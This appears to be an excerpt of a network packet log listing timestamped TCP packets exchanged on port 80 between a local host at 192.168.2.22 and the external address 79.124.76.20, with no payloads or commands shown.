Jan 5, 2021 10:06:48.408289909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408322096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408379078 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.408534050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408559084 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408643961 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.408679962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408766031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408834934 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.408926010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.408967972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409056902 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.409168959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409193993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409245968 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.409436941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409471035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409531116 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.409616947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409688950 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409822941 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.409861088 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409888029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.409939051 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.409970045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.410113096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.410157919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.410201073 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.410279989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.410341024 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.410439968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.410569906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.410614967 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.410779953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.410804033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.410861015 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.410998106 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411021948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411144972 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.411180019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411245108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411298037 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.411319017 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411490917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411544085 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.411565065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411775112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411803961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.411828041 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.412008047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412034035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412075996 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.412214994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412237883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412432909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412480116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412664890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412688971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412903070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.412925959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413117886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413146019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413245916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413461924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413486004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413737059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413759947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413932085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.413954973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.414416075 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.414424896 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.458543062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.458590031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.458616972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.458633900 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.458736897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.458801985 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.458822012 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.458924055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459023952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459064960 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.459145069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459275961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459292889 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.459388971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459501982 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459630966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459676027 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.459682941 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.459741116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459825039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.459979057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.460000038 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.460071087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.460175037 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.460196018 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.460259914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.460372925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.460396051 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.460500956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.460617065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.460640907 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.478275061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.478319883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.478343010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.478410006 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.478421926 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.478452921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.478656054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.478688002 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.478702068 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.478722095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.478869915 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.478876114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.478981972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.479069948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.479124069 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.479238033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.479459047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.479490995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.479681015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.479712009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.479886055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.479942083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480112076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480145931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480226040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480324984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480458975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480597973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480704069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480794907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.480910063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481020927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481223106 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481301069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481461048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481497049 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481551886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481697083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481817961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481913090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.481926918 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.481935978 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.482002974 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.482076883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.482280016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.482311010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.482388020 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.482477903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.482546091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.482577085 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.482580900 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.482644081 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.482841969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.482863903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.482935905 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.483105898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.483125925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.483164072 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.483295918 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.483319998 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.483434916 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.483530998 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.483553886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.483608961 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.483738899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.483781099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.483866930 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.483942986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484040022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484108925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484134912 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.484319925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484364033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484441042 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.484568119 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484591007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484637976 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.484750032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484813929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.484987020 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485018015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485229015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485256910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485476971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485497952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485665083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485693932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485784054 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.485886097 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.485907078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.486124039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.486145020 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.486335993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.486383915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.486572027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.486591101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.486816883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.486836910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487060070 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.487066031 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.487090111 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487112999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487270117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487293005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487457037 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.487524033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487543106 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487723112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487745047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487956047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.487987995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488173962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488197088 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488383055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488465071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488612890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488645077 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488729000 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.488739967 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.488743067 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.488867044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488897085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.488961935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.489064932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.489183903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.489310026 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.489527941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.489548922 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.489752054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.489783049 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.489932060 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.489942074 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.490039110 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490065098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490226984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490248919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490422010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490442038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490669966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490693092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490721941 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.490731955 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.490915060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490938902 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.490993023 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.491110086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.491132021 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.491247892 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.491353035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.491379023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.491514921 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.491568089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.491615057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.491657972 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.491799116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.491822958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.491935015 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.492058039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.493443012 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.493469000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.493581057 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.493773937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.493798018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.493824959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.493854046 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.493933916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.493990898 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.493999004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494153023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494246006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494266987 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.494437933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494469881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494538069 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.494679928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494703054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494796991 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.494906902 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494936943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.494976997 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.494985104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.495115042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.495230913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.495232105 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.502718925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.502769947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.502777100 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.502877951 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.502931118 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.503006935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503072977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503191948 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.503196001 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503310919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503360987 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.503586054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503611088 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503655910 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.503808022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503832102 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503894091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.503952026 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.504046917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.504112959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.504232883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.504369974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.504430056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.504559040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.504678965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.504806042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.504884958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505012035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505108118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505245924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505340099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505465984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505599976 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.505608082 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505723953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505841970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.505956888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.506073952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.506211042 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.506249905 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.506386042 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.506412983 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.506439924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.506614923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.506674051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.506838083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.506860971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507071972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507102013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507282972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507307053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507394075 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.507402897 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.507545948 CET	80	49170	79.124.76.20	192.168.2.22
